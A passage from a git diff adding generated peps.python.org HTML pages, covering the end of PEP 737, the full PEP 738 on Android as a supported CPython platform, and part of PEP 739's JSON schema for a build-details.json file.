+             obj, Py_TYPE(obj));
+
+
+

PyErr_Format() is called with a borrowed reference to ClassB. +When repr(obj) is called by the %R format, the last reference to +ClassB is removed and the class is deallocated. By the time the %T +format is processed, Py_TYPE(obj) is already a dangling pointer and +Python crashes.

+
+
+

Other proposed APIs to get a type fully qualified name

+
    +
  • Add type.__fullyqualname__ attribute: name without underscore +between words. Several dunders, including some of the most recently +added ones, include an underscore in the word: +__class_getitem__, __release_buffer__, __type_params__, +__init_subclass__ and __text_signature__.
  • +
  • Add type.__fqn__ attribute: FQN name stands for Fully +Qualified Name.
  • +
  • Add type.fully_qualified_name() method. Methods added to type +are inherited by all types and so can affect existing code.
  • +
  • Add a function to the inspect module. Need to import the +inspect module to use it.
  • +
+
+
+

Include the __main__ module in the type fully qualified name

+

Format type.__fully_qualified_name__ as +f"{type.__module__}.{type.__qualname__}", or type.__qualname__ if +type.__module__ is not a string or is equal to "builtins". Do +not treat the __main__ module differently: include it in the name.

+

Existing code such as type.__repr__(), collections.abc and +unittest modules format a type name with +f'{obj.__module__}.{obj.__qualname__}' and only omit the module part +if the module is equal to builtins.

+

Only the traceback and pdb modules also omit the module if it’s +equal to "builtins" or "__main__".

+

The type.__fully_qualified_name__ attribute omits the __main__ +module to produce shorter names for a common case: types defined in a +script run with python script.py. For debugging, the repr() +function can be used on a type; it includes the __main__ module in +the type name. Alternatively, use the f"{type.__module__}.{type.__qualname__}" +format to always include the module name, even for the "builtins" +module.

+

Example of script:

+
class MyType:
+    pass
+
+print(f"name: {MyType.__fully_qualified_name__}")
+print(f"repr: {repr(MyType)}")
+
+
+

Output:

+
name: MyType
+repr: <class '__main__.MyType'>
+
+
+
+
+
+

Discussions

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0737.rst

+

Last modified: 2024-06-01 20:53:34 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0738/index.html b/pep-0738/index.html new file mode 100644 index 00000000000..c5f9d07eede --- /dev/null +++ b/pep-0738/index.html @@ -0,0 +1,547 @@ + + PEP 738 – Adding Android as a supported platform | peps.python.org + +
+
+


+ + +
+
+
+

PEP 738 – Adding Android as a supported platform

+
+
Author:
+
Malcolm Smith <smith at chaquo.com>
+
Sponsor:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Dec-2023
+
Python-Version:
+
3.13
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Using Python on Android.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP proposes adding Android as a supported platform in CPython. The initial +goal is for Android to achieve Tier 3 support in Python 3.13.

+

This PEP is based on PEP 730 – “Adding iOS as a supported platform” by +Russell Keith-Magee, and covers many of the same issues. Notable differences +between the two platforms can be found by searching for the word “iOS”.

+
+
+

Motivation

+

Over the last 15 years, mobile platforms have become increasingly important +parts of the computing landscape. Android is the operating system that runs on +about 70% of these devices. However, there +is no official support for Android in CPython.

+

The Chaquopy, BeeWare and Kivy projects +have all supported Android for many years, and they have all been used to +generate applications that have been accepted for publication in the Google Play +Store. This demonstrates the technical feasibility of Android support.

+

It is important for the future of Python as a language that it is able to be +used on any platform that has widespread adoption. Otherwise, potential users +will choose other languages that do provide support for these platforms. This +is especially true in education, where the next generation of developers is in +many cases already spending more time using mobile platforms than desktop ones.

+
+
+

Rationale

+
+

General

+

Android is broadly a POSIX platform, based on a Linux kernel and the +ELF binary format. It does not use glibc, instead providing its own C +library implementation called Bionic. As a result, it is generally not +binary-compatible with any other Linux distribution, even if the architecture +matches. It also has its own filesystem layout which doesn’t resemble any other +Unix.

+

However, Android’s source-compatibility with Linux is quite good. In its early years, +the C library was very incomplete, but most of the gaps were filled by around +2014. Since then, any C code that compiles for Linux can usually be compiled for +Android, unless it involves direct access to hardware devices or operating +system services.

+

This is also true of CPython. Although it has never officially supported +Android, recent versions (since 3.6) can already be compiled for Android with +minimal patching.

+
+
+

OS versions

+

Each Android version can be identified in three ways:

+
    +
  • A conventional dotted version number (though recent versions have all used +whole numbers)
  • +
  • A sequential integer “API level” (the most common form in developer +documentation)
  • +
  • An alphabetic confectionery-themed code name (no longer used for marketing, +but still appears in developer documentation)
  • +
+

There is no consistent pattern to link one of these to another; they must be +looked up in a table.
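
+

For example, a few sample rows of that mapping, limited to versions mentioned in this PEP (the authoritative table is in Android's developer documentation):

+
# API level -> dotted version number, for a few versions cited in this PEP.
+API_LEVEL_TO_VERSION = {
+    21: "5.0",  # the proposed minimum for Python 3.13
+    30: "11",   # oldest version still receiving security updates (Oct 2023)
+    34: "14",   # current at the time of writing
+}
+print(API_LEVEL_TO_VERSION[21])  # 5.0
+
+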

+

A new major Android version is released each year, but the updates available to +each device are entirely under the control of its manufacturer. Unfortunately +many manufacturers stop sending updates to devices long before their users are +ready to dispose of them. For example, as of October 2023, the oldest Android +version still receiving security updates was API level 30, but according to +Google’s own statistics, only 60% +of devices were on that version or newer.

+

For Python 3.13 we therefore propose the minimum Android version to be 5.0 +(API level 21), which was released in 2014. According to the statistics above, +this would cover 99% of active devices.

+
+
+

Development tools

+

The Android development tools are equally supported on Linux (x86_64), Windows +(x86_64) and macOS (x86_64 and ARM64). For CPython, the most important tools +are:

+
    +
  • The NDK (native development kit) contains a C and C++ compiler (clang), +linker (lld), and headers for all the system libraries.

    Binary compatibility between libraries compiled with different versions of the +NDK is generally very good, but for reproducibility it would be best for each +Python version to stick with one NDK version throughout its life. For Python +3.13, this would be the current NDK long-term support version, r26.

    +

    Each NDK version can be set to target any of a wide range of Android versions. +For example, NDK r26 supports API levels 21 to 34. +However, binaries compiled for an older Android version will usually keep on +working indefinitely on newer versions; exceptions to this rule are only made +for security reasons.

    +
  • +
  • Gradle is the tool used to build complete, deployable apps.
  • +
  • The emulator, based on QEMU, is a simulated Android device running on a +development machine. Unlike on iOS, an emulator uses the same ABI as a real +device of the same architecture, and can run the same binaries.
  • +
+

These tools may all be used either from the command line, or through the Android +Studio IDE, which is based on IntelliJ IDEA.

+
+
+

Architectures

+

Android currently supports 4 architectures. Their names as used by the Android +tools are:

+
    +
  • armeabi-v7a
  • +
  • arm64-v8a
  • +
  • x86
  • +
  • x86_64
  • +
+

Virtually all current physical devices use one of the ARM architectures. x86 +and x86_64 are supported for use in the emulator.

+

For Python 3.13 we propose that Tier 3 support will only cover the 64-bit platforms +(arm64-v8a and x86_64):

+
    +
  • x86 has not been supported as a development platform since 2020, and no +new emulator images have been released since then.
  • +
  • armeabi-v7a’s proportion of active devices is now +less than 10% and steadily falling.

    It would also be more difficult to cover with a reliable buildbot, since there +are no native hosts available for the emulator (ARM64 Macs don’t have hardware +support for ARM32 code). Although cross-architecture emulation is possible, it +has much worse performance and stability, which is why the armeabi-v7a +emulator images have not been updated since 2016.

    +

    However, it continues to be used for watches and ultra-low-cost phones. If +this persists, we may need to consider adding it in a future Python version.

    +
  • +
+

Even if 32-bit architectures are not officially supported, no changes should be +made which would impede any downstream projects which still wish to build them.

+
+
+

App lifecycle

+

The primary programming language in Android apps is Java, or its modern descendant +Kotlin. As such, an app does not provide its own executable file. Instead, all +apps start off as a Java virtual machine running an executable provided by the +operating system. The app’s Java code can then add native code to the process by +loading dynamic libraries and calling them through JNI.

+

Unlike iOS, creating subprocesses is supported on Android. However apps may +only run executables in certain locations, none of which +are writable at runtime. Long-running subprocesses are officially discouraged, and are not +guaranteed to be supported in future Android versions.

+

Android does provide a command-line shell, but this is intended only for use by +developers, and is not available to the typical end user.

+

For these reasons, the recommended way of running Python on Android will be by +loading libpython3.x.so into the main app process. A python3.x +executable will not be officially supported on this platform.

+
+
+
+

Specification

+
+

Scope of work

+

The focus of this work will be to produce an Android equivalent to the existing +Windows embeddable package, +i.e. a set of compiled libraries which developers +can add to their apps. No installer will be required.

+

Adding Android as a Tier 3 platform only requires adding support for compiling +an Android-compatible build from the unpatched CPython source code. It does not +necessarily require there to be any officially distributed Android artifacts on +python.org, although these could be added in the future.

+

Android will be built using the same configure and Makefile system as other +POSIX platforms, and must therefore be built on a POSIX platform. Both Linux +and macOS will be supported.

+

A Gradle project will be provided for the purpose of running the CPython test +suite. Tooling will be provided to automate the process of building the test +suite app, starting the emulator, installing the test suite, and executing +it.

+
+
+

Linkage

+

For the reasons discussed in App lifecycle, Python will be included in the +app as a dynamic libpython3.x.so library which can be loaded into an app +using dlopen.

+

Unlike Linux, Android does not implicitly use a dlopened library to resolve +relocations in subsequently-loaded libraries, even if RTLD_GLOBAL is used. All +Python extension modules must therefore be explicitly linked against +libpython3.x.so when building for Android.

+

An extension module linked against libpython3.x.so cannot be loaded by an +executable that has been statically linked against libpython3.x.a. +Therefore, a static libpython3.x.a library will not be supported on Android. +This is the same pattern used by CPython on Windows.

+

This approach also allows using the -Wl,--no-undefined option to detect +missing symbols at build time, which can be a significant time-saver.

+

Unlike iOS, Android allows dynamic libraries to be loaded from any location, so +a directory tree containing co-located .py, .pyc and .so files can be handled by +Python’s standard importer.

+
+
+

Standard library

+
+

Unsupported modules

+

A number of standard library modules will not be supported on Android because +the underlying C APIs are not available:

+
    +
  • curses and readline
  • +
  • dbm.gnu and dbm.ndbm
  • +
  • grp
  • +
  • multiprocessing – although subprocesses in general are allowed (see App +lifecycle), Android does not support any part of the System V IPC API.
  • +
  • tkinter and turtle – these would require an Android build of Tk +itself, which is not officially supported.
  • +
+
+
+

sys

+

sys.platform will return "android". Although Android is based on Linux, +it differs in enough significant ways that a separate name is justified.

+

When embedded in an Android app, the C-level stdio streams are not connected to +anything. So in this mode, sys.stdout and sys.stderr will be redirected +to the system Logcat, +which can be viewed with the Android development tools. sys.stdin will +always return EOF.
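A small sketch of what embedded code could expect under this proposal (illustrative only; the redirection is performed by the interpreter, not by user code):

import sys

if sys.platform == "android":
    # print() output goes to the system Logcat rather than a console,
    # and can be viewed with the Android development tools.
    print("hello from embedded Python")
    # The C-level stdin is not connected to anything, so reads see EOF.
    assert sys.stdin.read() == ""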

+
+
+

platform

+

Most of the values returned by the platform module will match those returned +by os.uname(), with the exception of:

+
    +
  • platform.system() - "Android", instead of the default "Linux"
  • +
  • platform.release() - Android version number, as a string (e.g. "14"), +instead of the Linux kernel version
  • +
+

In addition, a platform.android_ver() function will be added, which returns a +namedtuple containing the following (see the usage sketch after this list):

+
    +
  • release - Android version of the device, as a string (e.g. "14")
  • +
  • api_level - API level of the device, as an +integer (e.g. 34)
  • +
  • manufacturer - manufacturer of +the device, as a string (e.g. "Google")
  • +
  • model - model name of the +device, as a string (e.g. "Pixel 7")
  • +
  • device - device name of the +device, as a string (e.g. "panther")
  • +
  • is_emulator - True if the device is an emulator; False if it’s a +physical device.
  • +
+
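A usage sketch for the proposed function (the field values shown are the illustrative examples from the list above, not guarantees):

import platform

if platform.system() == "Android":
    ver = platform.android_ver()
    ver.release       # e.g. "14"
    ver.api_level     # e.g. 34
    ver.manufacturer  # e.g. "Google"
    ver.model         # e.g. "Pixel 7"
    ver.device        # e.g. "panther"
    ver.is_emulator   # False on a physical device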

Which one of model and device is more likely to be unique, and which one +is more likely to resemble the marketing name, varies between different +manufacturers.

+
+
+

os

+

os.uname() will return the raw result of a POSIX uname() call. This will +result in the following values:

+
    +
  • sysname - "Linux"
  • +
  • release - The Linux kernel version (e.g. +"5.10.157-android13-4-00003-gdfb1120f912b-ab10994928")
  • +
+

This approach treats the os module as a “raw” interface to system APIs, and +platform as a higher-level API providing more generally useful values.
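A sketch of the resulting split, using the illustrative values above:

import os
import platform

os.uname().sysname   # "Linux" (raw kernel identification)
os.uname().release   # kernel version, e.g. "5.10.157-android13-..."
platform.system()    # "Android" (higher-level, user-facing value)
platform.release()   # Android version, e.g. "14"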

+
+
+
+

CI resources

+

Since Android emulators and physical devices use the same ABI, and come with +identical or very similar operating system binaries, testing on emulators will +be adequate. x86_64 emulators can be run on Linux, macOS or Windows, but ARM64 +emulators are only supported on ARM64 Macs.

+

Anaconda has offered +to provide physical hardware to run Android buildbots. These will include both +Linux x86_64 and macOS ARM64 machines, which would cover both supported runtime +architectures and both supported build platforms.

+

CPython does not currently test Tier 3 platforms on GitHub Actions, but if this +ever changes, their Linux and macOS runners are also able to host Android +emulators. macOS ARM64 runners have been free to all public repositories +since January 2024.

+
+
+

Packaging

+

Android wheels will use tags in the format android_<api-level>_<abi>. For +example:

+
    +
  • android_21_arm64_v8a
  • +
  • android_21_x86_64
  • +
+

For the meaning of <api-level>, see OS versions. In the context of +the wheel tag, it indicates the minimum Android version that was selected when +the wheel was compiled. Installation tools such as pip should interpret this in +a similar way to the existing macOS tags, i.e. an app with a minimum API level +of N can incorporate wheels tagged with API level N or older.
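A hypothetical helper illustrating this rule (a sketch, not pip's actual implementation; the function name is invented):

def android_tag_compatible(tag: str, app_api_level: int, app_abi: str) -> bool:
    """Return True if a wheel with this tag can be used by an app
    built for app_api_level and app_abi (hypothetical helper)."""
    if not tag.startswith("android_"):
        return False
    level, _, abi = tag.removeprefix("android_").partition("_")
    # A wheel built for API level N is usable by apps targeting N or newer.
    return level.isdigit() and int(level) <= app_api_level and abi == app_abi

assert android_tag_compatible("android_21_arm64_v8a", 34, "arm64_v8a")
assert not android_tag_compatible("android_34_x86_64", 21, "x86_64")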

+

This format originates from the Chaquopy project, which currently maintains a +wheel repository with tags varying between +API levels 16 and 21.

+

However, relying on a small group of Android enthusiasts to build the whole +Python ecosystem is not a scalable solution. Until prominent libraries routinely +release their own Android wheels, the ability of the community to adopt +Python on Android will be limited.

+

Therefore, it will be necessary to clearly document how projects can add Android +builds to their CI and release tooling. Adding Android support to tools like +crossenv and cibuildwheel may be one way to achieve this.

+

The Android wheel tag format should also be added to the list of tags accepted +by PyPI.

+
+
+

PEP 11 Update

+

PEP 11 will be updated to include the two supported Android ABIs. Autoconf +already identifies them with the following triplets:

+
    +
  • aarch64-linux-android
  • +
  • x86_64-linux-android
  • +
+

Petr Viktorin will serve as the initial core team contact for these ABIs.

+
+
+
+

Backwards Compatibility

+

Adding a new platform does not introduce any backwards compatibility concerns to +CPython itself. However, there may be some backwards compatibility implications +for the projects that have historically provided CPython support (i.e., BeeWare +and Kivy) if the final form of any CPython patches doesn’t align with the patches +they have historically used.

+
+
+

Security Implications

+

Adding a new platform does not add any new security implications.

+
+
+

How to Teach This

+

The educational needs related to this PEP concern two groups of developers.

+

First, developers of apps need to know how to build Python into an Android +app, along with their own Python code and any supporting packages, and how to +use them all at runtime. The documentation will cover this in a similar form to +the existing Windows embeddable package. +However, it will recommend that most developers use higher-level tools such as +Briefcase, +Chaquopy and Buildozer, all of which already have +comprehensive documentation.

+

Second, developers of packages with binary components need to know how to +build and release them for Android (see Packaging).

+
+
+

Reference Implementation

+

The Chaquopy repository contains a reference +patch and build scripts. These will have to be decoupled from the other +components of Chaquopy before they can be upstreamed.

+

Briefcase provides a reference +implementation of code to execute test suites on Android devices and emulators. +The Toga Testbed is an +example of a test suite that is executed on the Android emulator using GitHub +Actions.

+
+
+

Rejected Ideas

+

The following changes were made to the original specification of +platform.android_ver():

+
    +
  • The min_api_level field was removed, because unlike all the other fields, +it isn’t a property of the current device. This information is still available +from the pre-existing function sys.getandroidapilevel().
  • +
  • The is_emulator field was added, since experience during testing showed +that some issues were emulator-specific.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0738.rst

+

Last modified: 2024-10-07 17:43:06 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0739/index.html b/pep-0739/index.html new file mode 100644 index 00000000000..cf84b767849 --- /dev/null +++ b/pep-0739/index.html @@ -0,0 +1,1559 @@ + + + + + + + + PEP 739 – Static description file for build details of Python installations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 739 – Static description file for build details of Python installations

+
+
Author:
+
Filipe Laíns <lains at riseup.net>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
19-Dec-2023
+
Python-Version:
+
3.14
+
+
+
+
Table of Contents +
+
+

Abstract

+

Introduce a standard format for a static description file with build details +of Python installations.

+
+
+

Rationale

+

When introspecting a Python installation, running code is often undesirable or +impossible. Having a static description file makes various Python build +details available without having to run the interpreter.

+

This is helpful for use-cases such as cross-compilation, Python launchers, etc.

+
+
+

Scope

+

This PEP defines a format for the description file, and a standard location for +where to place it.

+
+
+

Location

+

When possible, Python installations should install the static description file +inside the standard library directory, with the name build-details.json +(e.g. /usr/lib/python3.14/build-details.json).
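For illustration, a minimal consumer sketch, assuming the file exists at this standard location (a launcher or cross-compilation tool would locate the directory without running the interpreter; sysconfig is used here only for brevity):

import json
import sysconfig
from pathlib import Path

path = Path(sysconfig.get_path("stdlib")) / "build-details.json"
details = json.loads(path.read_text(encoding="utf-8"))
details["platform"]             # e.g. "linux-x86_64"
details["language"]["version"]  # e.g. "3.14"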

+
+

Important

+

Given that there may be technical challenges, Python implementations are not +required to provide the file if not feasible. In such scenarios, they may +choose to provide it in a different manner.

+
+
+

Attention

+

The standard location specified here does not prevent the +file from additionally being provided in another location, and with a +different name. In fact, the PEP authors expect future PEPs to define +additional locations to install this file, for better discoverability.

+
+
+
+

Format

+

The format specification is defined by the JSON Schema definition provided +below, which is rendered in a human-readable format here.

+ ++++ + + + + + + + + + + + + + + + + + +
$schemahttps://json-schema.org/draft/2020-12/schema
$idhttps://github.com/python/peps/blob/main/peps/pep-0739/python-build-info-v1.0.schema.json
TitleStatic description file for the build details of Python +installations
Typeobject
Additional propertiesNot allowed
+
+

schema_version

+ ++++ + + + + + + + + + + + +
Typestring (constant — 1.0)
DescriptionSchema version.

This is a string following the format <MAJOR>.<MINOR>, where +<MAJOR> and <MINOR> are unpadded numbers and represent +the major and minor components of the version. Versions +may be arithmetically compared by interpreting the version string as +a decimal number.

+

For this specification version, this value is constant and MUST +be 1.0.

+

Future versions of this schema MUST use a higher version number. +Future versions of this schema MUST NOT use the same major +version component as other schema versions unless its +specification is deemed backwards-compatible with them — it +can’t change, or extend, any parts of the current specification +in such a way that the semantics of the interpreted data differ, +or that data valid under the new specification is invalid under +the older specification, with the exception of additional +properties (errors caused by additionalProperties).

+
RequiredTrue
+
+
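A sketch of the comparison rule described above (interpreting the version string as a decimal number; the helper name is invented):

def schema_supported(version: str, max_supported: float = 1.0) -> bool:
    # "1.0" parses as the decimal number 1.0, "2.0" as 2.0, and so on.
    return float(version) <= max_supported

assert schema_supported("1.0")
assert not schema_supported("2.0")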
+

base_prefix

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionBase prefix of the Python installation.

Either an absolute path, or a relative path to the directory where +this file is contained.

+
Examples/usr, ../.., etc.
RequiredFalse
+
+
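A sketch of resolving this key (the helper name is invented; per the description above, a relative base_prefix is resolved against the directory containing this file):

from pathlib import Path

def resolve_base_prefix(build_details_file: Path, details: dict) -> Path:
    base = Path(details.get("base_prefix", "."))
    if not base.is_absolute():
        base = build_details_file.parent / base
    return base.resolve()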
+

platform

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionSystem platform string.

This field SHOULD be equivalent to sysconfig.get_platform().

+
Examples
    +
  • linux-x86_64
  • +
  • etc.
  • +
+
RequiredTrue
+
+
+

language

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing details related to the Python language +specification.

In addition to the required keys, implementations may choose to +include extra keys with implementation-specific details.

+
RequiredTrue
Additional propertiesNot allowed
+
+

language.version

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionString representation of the Python language version — a version +string consisting only of the major and minor components.

This field SHOULD be equivalent to +sysconfig.get_python_version().

+
Examples3.14, etc.
RequiredTrue
+
+
+

language.version_info

+ ++++ + + + + + + + + + + + + + + + + + +
Typeobject
DescriptionObject in the format of sys.version_info.

This section SHOULD be equivalent to +sys.version_info.

+
Examples
    +
  • {'major': 3, 'minor': 14, 'micro': 1, 'releaselevel': 'final', 'serial': 0}
  • +
  • etc.
  • +
+
RequiredFalse
Additional propertiesNot allowed
+
+
language.version_info.major
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
language.version_info.minor
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
language.version_info.micro
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
language.version_info.releaselevel
+ ++++ + + + + + + + + +
Typestring (enum — alpha, beta, candidate, final)
RequiredTrue
+
+
+
language.version_info.serial
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
+
+

implementation

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing details related to the Python implementation.

This section SHOULD be equivalent to +sys.implementation. It follows the specification defined +in PEP 421, meaning that on top of the required keys, +implementation-specific keys can also exist, but must be +prefixed with an underscore.

+
RequiredTrue
Additional propertiesAllowed
+
+

implementation.name

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionLower-case name of the Python implementation.
Examplescpython, pypy, etc.
RequiredTrue
+
+
+

implementation.version

+ ++++ + + + + + + + + + + + + + + + + + +
Typeobject
DescriptionObject in the format of sys.version_info, containing +the implementation version.
Examples
    +
  • {'major': 3, 'minor': 14, 'micro': 1, 'releaselevel': 'final', 'serial': 0}
  • +
  • {'major': 7, 'minor': 3, 'micro': 16, 'releaselevel': 'final', 'serial': 0}
  • +
  • etc.
  • +
+
RequiredTrue
Additional propertiesNot allowed
+
+
implementation.version.major
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
implementation.version.minor
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
implementation.version.micro
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
implementation.version.releaselevel
+ ++++ + + + + + + + + +
Typestring (enum — alpha, beta, candidate, final)
RequiredTrue
+
+
+
implementation.version.serial
+ ++++ + + + + + + + + +
Typenumber
RequiredTrue
+
+
+
+
+

interpreter

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing details of the Python interpreter.

This section MUST be present if the Python installation provides +an interpreter binary, otherwise this section will be missing.

+
RequiredFalse
Additional propertiesNot allowed
+
+

interpreter.path

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionThe path to the Python interpreter. Either an absolute path, or a +relative path to the path defined in the base_prefix key.
Examples
    +
  • /usr/bin/python
  • +
  • bin/python
  • +
  • etc.
  • +
+
RequiredTrue
+
+
+
+

abi

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing details related to ABI.
RequiredFalse
Additional propertiesNot allowed
+
+

abi.flags

+ ++++ + + + + + + + + + + + + + + +
Typearray
DescriptionBuild configuration flags, used to calculate the extension +suffix.

The flags MUST be defined in the order they appear on the +extension suffix.

+
Examples['t', 'd'], etc.
RequiredTrue
+
+
+

abi.extension_suffix

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionSuffix used for extensions built against the current +implementation version.

This field MUST be present if the Python implementation supports +extensions, otherwise this entry will be missing.

+
Examples
    +
  • .cpython-314-x86_64-linux-gnu.so
  • +
  • etc.
  • +
+
RequiredTrue
+
+
+

abi.stable_abi_suffix

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionSuffix used for extensions built against the stable ABI.

This field MUST be present if the Python implementation has a +stable ABI extension suffix, otherwise this entry will be +missing.

+
Examples.abi3.so, etc.
RequiredFalse
+
+
+
+

suffixes

+ ++++ + + + + + + + + + + + + + + + + + +
Typeobject
DescriptionValid module suffixes grouped by type.

This section SHOULD be equivalent to the +importlib.machinery.*_SUFFIXES attributes, if the +implementation provides such suffixes. However, if the Python +implementation does not provide suffixes of the kind specified +by any of the attributes, the equivalent sub-section is not +required to be present. Additionally, if a Python implementation +provides extension kinds other than the ones listed in the +importlib.machinery module, they MAY add a sub-section for +them.

+
Examples
    +
  • {'source': ['.py'], 'bytecode': ['.pyc'], 'optimized_bytecode': ['.pyc'], 'debug_bytecode': ['.pyc'], 'extensions': ['.cpython-313-x86_64-linux-gnu.so', '.abi3.so', '.so']}
  • +
  • etc.
  • +
+
RequiredFalse
Additional propertiesAllowed
+
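For example, a CPython-based implementation might derive this section as follows (a sketch; the key names mirror the example above):

import importlib.machinery as machinery

suffixes = {
    "source": machinery.SOURCE_SUFFIXES,
    "bytecode": machinery.BYTECODE_SUFFIXES,
    "optimized_bytecode": machinery.OPTIMIZED_BYTECODE_SUFFIXES,
    "debug_bytecode": machinery.DEBUG_BYTECODE_SUFFIXES,
    "extensions": machinery.EXTENSION_SUFFIXES,
}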
+
+

libpython

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing details related to the libpython library.

This section MUST be present if the Python installation provides a +libpython library, otherwise this section will be missing.

+
RequiredFalse
Additional propertiesNot allowed
+
+

libpython.dynamic

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionThe path to the dynamic libpython library. Either an +absolute path, or a relative path to the path defined in the +base_prefix key.

This field MUST be present if the Python installation provides a +dynamic libpython library, otherwise this entry will be +missing.

+
Examples
    +
  • /usr/lib/libpython3.14.so.1.0
  • +
  • lib/libpython3.14.so.1.0
  • +
  • etc.
  • +
+
RequiredFalse
+
+
+

libpython.dynamic_stableabi

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionThe path to the dynamic libpython library for the stable +ABI. Either an absolute path, or a relative path to the path +defined in the base_prefix key.

This field MUST be present if the Python installation provides a +dynamic libpython library, otherwise this entry will be +missing.

+
Examples
    +
  • /usr/lib/libpython3.so
  • +
  • lib/libpython3.so
  • +
  • etc.
  • +
+
RequiredFalse
+
+
+

libpython.static

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionThe path to the static libpython library. Either an absolute +path, or a relative path to the path defined in the +base_prefix key.

This field MUST be present if the Python installation provides a +static libpython library, otherwise this entry will be +missing.

+
Examples
    +
  • /usr/lib/python3.14/config-3.14-x86_64-linux-gnu/libpython3.14.a
  • +
  • lib/python3.14/config-3.14-x86_64-linux-gnu/libpython3.14.a
  • +
  • etc.
  • +
+
RequiredFalse
+
+ +
+
+

c_api

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing details related to the Python C API, if +available.

This section MUST be present if the Python implementation +provides a C API, otherwise this section will be missing.

+
RequiredFalse
Additional propertiesNot allowed
+
+

c_api.headers

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionThe path to the C API headers. Either an absolute path, or a +relative path to the path defined in the base_prefix key.
Examples
    +
  • /usr/include/python3.14
  • +
  • include/python3.14
  • +
  • etc.
  • +
+
RequiredTrue
+
+
+

c_api.pkgconfig_path

+ ++++ + + + + + + + + + + + + + + +
Typestring
DescriptionThe path to the pkg-config definition files. Either an absolute +path, or a relative path to the path defined in the +base_prefix key.

This field MUST be present if the Python implementation provides +pkg-config definition files for the C API, otherwise this +entry will be missing.

+
Examples
    +
  • /usr/lib/pkgconfig
  • +
  • lib/pkgconfig
  • +
  • etc.
  • +
+
RequiredFalse
+
+
+
+

arbitrary_data

+ ++++ + + + + + + + + + + + + + + +
Typeobject
DescriptionObject containing extra arbitrary data.

This is meant to be used as an escape-hatch, to include any +relevant data that is not covered by this specification. +Implementations may choose what data to provide in this section.

+
RequiredFalse
Additional propertiesAllowed
+
+
+
+

Example

+
 1{
+ 2  "schema_version": "1.0",
+ 3  "base_prefix": "/usr",
+ 4  "platform": "linux-x86_64",
+ 5  "language": {
+ 6    "version": "3.14",
+ 7    "version_info": {
+ 8      "major": 3,
+ 9      "minor": 14,
+10      "micro": 0,
+11      "releaselevel": "alpha",
+12      "serial": 0
+13    }
+14  },
+15  "implementation": {
+16    "name": "cpython",
+17    "version": {
+18      "major": 3,
+19      "minor": 14,
+20      "micro": 0,
+21      "releaselevel": "alpha",
+22      "serial": 0
+23    },
+24    "hexversion": 51249312,
+25    "cache_tag": "cpython-314",
+26    "_multiarch": "x86_64-linux-gnu"
+27  },
+28  "interpreter": {
+29    "path": "/usr/bin/python"
+30  },
+31  "abi": {
+32    "flags": ["t", "d"],
+33    "extension_suffix": ".cpython-314-x86_64-linux-gnu.so",
+34    "stable_abi_suffix": ".abi3.so"
+35  },
+36  "suffixes": {
+37    "source": [".py"],
+38    "bytecode": [".pyc"],
+39    "optimized_bytecode": [".pyc"],
+40    "debug_bytecode": [".pyc"],
+41    "extensions": [".cpython-314-x86_64-linux-gnu.so", ".abi3.so", ".so"]
+42  },
+43  "libpython": {
+44    "dynamic": "/usr/lib/libpython3.14.so.1.0",
+45    "dynamic_stableabi": "/usr/lib/libpython3.so",
+46    "static": "/usr/lib/python3.14/config-3.14-x86_64-linux-gnu/libpython3.14.a",
+47    "link_to_libpython": true
+48  },
+49  "c_api": {
+50    "headers": "/usr/include/python3.14",
+51    "pkgconfig_path": "/usr/lib/pkgconfig"
+52  }
+53}
+
+
+
+
+

JSON Schema

+
  1{
+  2  "$schema": "https://json-schema.org/draft/2020-12/schema",
+  3  "$id": "https://github.com/python/peps/blob/main/peps/pep-0739/python-build-info-v1.0.schema.json",
+  4  "type": "object",
+  5  "title": "Static description file for the build details of Python installations",
+  6  "required": [
+  7    "schema_version",
+  8    "platform",
+  9    "language",
+ 10    "implementation"
+ 11  ],
+ 12  "additionalProperties": false,
+ 13  "properties": {
+ 14    "schema_version": {
+ 15      "type": "string",
